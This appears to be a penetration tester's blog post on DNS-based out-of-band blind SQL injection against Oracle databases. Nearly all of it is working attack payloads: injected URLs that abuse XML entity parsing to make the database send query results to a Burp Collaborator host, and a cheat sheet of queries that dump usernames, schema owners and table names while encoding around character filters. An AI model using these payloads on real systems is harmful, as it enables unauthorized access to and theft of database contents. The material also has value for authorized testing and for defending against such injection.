DNS Based Out of Band Blind SQL injection in Oracle — Dumping data

Burp Collaborator DNS Interaction
http://website.com/somesearch-endpoint?q=%2c%20(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % taeyj SYSTEM "http://adfdlongrandomburpcollabstringjflf.burpcollab'||'orator.net/">%taeyj;]>'),'/l') from dual)

Determining the backend database

Dumping Data???

http://website.com/somesearch-endpoint?q=%2c%20(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % taeyj SYSTEM "http://'||(select banner from v$version)||'.adfdlongrandomburpcollabstringjflf.burpcollab'||'orator.net/">%taeyj;]>'),'/l') from dual)

Things to Keep in Mind while Exploiting DNS based Out of Band SQL Injections

  • You’re dumping data via DNS queries, and spaces/newline/special characters aren’t allowed in Domains Names. Domain and Subdomain Names can only consist of letters, numbers and hyphens ‘-’. Use functions such as REPLACE() to filter the output. (Sometimes multiple dots ‘.’ are disabled as well, so make sure to replace them as well). You can also use HEX and Base64 encoding filters like UTL_RAW.CAST_TO_VARCHAR2(), utl_encode.base64_encode(), utl_raw.cast_to_raw(). (Ref https://dba.stackexchange.com/questions/128905/what-is-a-base64-raw-how-do-i-use-it)
  • A full domain name can have 253 character, with each label having maximum length of 63 characters. That means there are only 63 characters allowed in a subdomain name but it is recommended to use up to 30–40 characters to dump data at a time. Use SUBSTR() to limit the output.
  • Most probably you’ll have to generate new Burp Collaborator link every time you send a request to the server. Why? because servers might cache domain names, so they won’t issue a DNS request every time for the same Domain Name.
  • Backend code might be sanitizing some characters in your query, so make sure to try simple queries first then move on to the complex ones. While exploiting this SQLi, I never got this query to work “select banner from v$version”, or any query that contained the dollar sign “$”. Tried different encodings but none of them worked, Reason? They might be sanitizing or encoding some special characters!! Might be some other reason, don’t know.

Dumping Data

(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % cggnv SYSTEM "http://'||(SELECT replace(replace(username, " ","-"),"$","-") FROM all_users where rownum=1)||'.sealongrandomcollabstringai.burpcollab'||'orator.net/">%cggnv;]>'),'/l') from dual)
(SELECT replace(replace(username, " ","-"),"$","-") FROM all_users where rownum=1)
(SELECT replace(replace(username, " ","-"),"$","-") FROM all_users where rownum=1)
(SELECT username FROM all_users where rownum=1)
(SELECT username FROM (SELECT username, rownum as rn FROM all_users order by username asc) where rn=2)
(select owner from (select owner, rownum as rn from (select DISTINCT owner from all_tables order by owner asc)) where rn=1)(select owner from (select owner, rownum as rn from (select DISTINCT owner from all_tables order by owner asc)) where rn=2)
(select table_name from (select table_name,rownum as rn from all_tables order by table_name asc)rn where rn=1)
(select replace(replace((table_name),' ','-'),'$','-') from (select table_name,rownum as rn from all_tables order by table_name asc)rn where rn=1)

Dump In One Shot (DIOS)

select ltrim(sys_connect_by_path(username, '-'),'-')as st FROM (SELECT username, ROW_NUMBER () OVER (ORDER BY username) rn, COUNT (*) OVER () cnt FROM all_users) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn+1;
select ltrim(sys_connect_by_path(username, '-'),'-')as st FROM (SELECT username, ROW_NUMBER () OVER (ORDER BY username) rn, COUNT (*) OVER () cnt FROM all_users where rownum<= 10) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn+1;
select substr(replace(replace(ltrim(sys_connect_by_path(username, '-'),'-'),'_','-'),'$','-'),2,40)as st FROM (SELECT username, ROW_NUMBER () OVER (ORDER BY username) rn, COUNT (*) OVER () cnt FROM all_users where rownum<=40) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn+1;
select replace(UTL_RAW.CAST_TO_VARCHAR2(utl_encode.base64_encode (utl_raw.cast_to_raw(substr(ltrim(sys_connect_by_path(username, '-'),'-'),2,40)))),'=','-')as st FROM (SELECT username, ROW_NUMBER () OVER (ORDER BY username) rn, COUNT (*) OVER () cnt FROM all_users where rownum<= 40) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn+1;

Cheat Sheet

select username FROM all_users where rownum=1//Replacing bad chars
select replace(replace(replace(username," ","-"),"$","-"),"_", "-") FROM all_users where rownum=1
(SELECT replace(replace(replace(username, " ","-"),"$","-"),"_", "-") FROM (SELECT username, rownum as rn FROM all_users order by username asc) where rn=1)
(select replace(replace(replace(owner," ","-"),"$","-"),"_","-") from (select owner, rownum as rn from (select DISTINCT owner from all_tables order by owner asc)) where rn=1)
(select replace(replace(replace(table_name," ","-"),"$","-"),"_", "-") from (select table_name,rownum as rn from all_tables order by table_name asc)rn where rn=1)
select substr(replace(replace(replace(ltrim(sys_connect_by_path(username, '-'),'-'),'_','-'),'$','-'),' ','-'),2,40)as st FROM (SELECT username, ROW_NUMBER () OVER (ORDER BY username) rn, COUNT (*) OVER () cnt FROM all_users where rownum<= 40) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn+1;
select substr(replace(replace(replace(ltrim(sys_connect_by_path(owner, '-'),'-'),'_','-'),'$','-'),' ','-'),2,40)as st FROM (SELECT owner, ROW_NUMBER () OVER (ORDER BY owner) rn, COUNT (*) OVER () cnt FROM all_tables where rownum<= 40) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn+1;
select substr(replace(replace(replace(ltrim(sys_connect_by_path(table_name, '-'),'-'),'_','-'),'$','-'),' ','-'),2,40)as st FROM (SELECT table_name, ROW_NUMBER () OVER (ORDER BY table_name) rn, COUNT (*) OVER () cnt FROM all_tables where rownum<= 40) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn+1;
select replace(replace(replace(UTL_RAW.CAST_TO_VARCHAR2(utl_encode.base64_encode(utl_raw.cast_to_raw(substr(ltrim(sys_connect_by_path(username,'-'),'-'),2,40)))),'=','-'),' ','-'),'/','-')as st FROM (SELECT username, ROW_NUMBER () OVER (ORDER BY username) rn, COUNT (*) OVER () cnt FROM all_users where rownum<= 40) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn+1;
select replace(replace(replace(UTL_RAW.CAST_TO_VARCHAR2(utl_encode.base64_encode(utl_raw.cast_to_raw(substr(ltrim(sys_connect_by_path(owner,'-'),'-'),2,40)))),'=','-'),' ','-'),'/','-')as st FROM (SELECT owner, ROW_NUMBER () OVER (ORDER BY owner) rn, COUNT (*) OVER () cnt FROM all_tables where rownum<= 40) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn+1;
select replace(replace(replace(UTL_RAW.CAST_TO_VARCHAR2(utl_encode.base64_encode(utl_raw.cast_to_raw(substr(ltrim(sys_connect_by_path(table_name, '-'),'-'),2,40)))),'=','-'),' ','-'),'/','-')as st FROM (SELECT table_name, ROW_NUMBER () OVER (ORDER BY table_name) rn, COUNT (*) OVER () cnt FROM all_tables where rownum<= 40) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn+1;

--

--

--

Ethical Hacker | Penetration Tester https://twitter.com/UsamaAzad14

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

The Close Combat and Horde Mode update will arrive later

Software Project Workflow In Nutshell

Deploy Single-Zone & Multi-Zone OpenShift Classic Cluster in IBM Cloud with Terraform

Distribution, replication, and resiliency — core for modern data platforms

MvRx with Dagger2

Building the NFL’s Most Profitable Team — Part One: Data Mining

Micro Vs Macro Vs Mono

Outside-In Development

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Usama Azad

Usama Azad

Ethical Hacker | Penetration Tester https://twitter.com/UsamaAzad14

More from Medium

Bypass File Upload Restrictions

WMI for Script Kiddies — TrustedSec

Container Security-Common issues

Backdoor — HackTheBox Machine Write-Up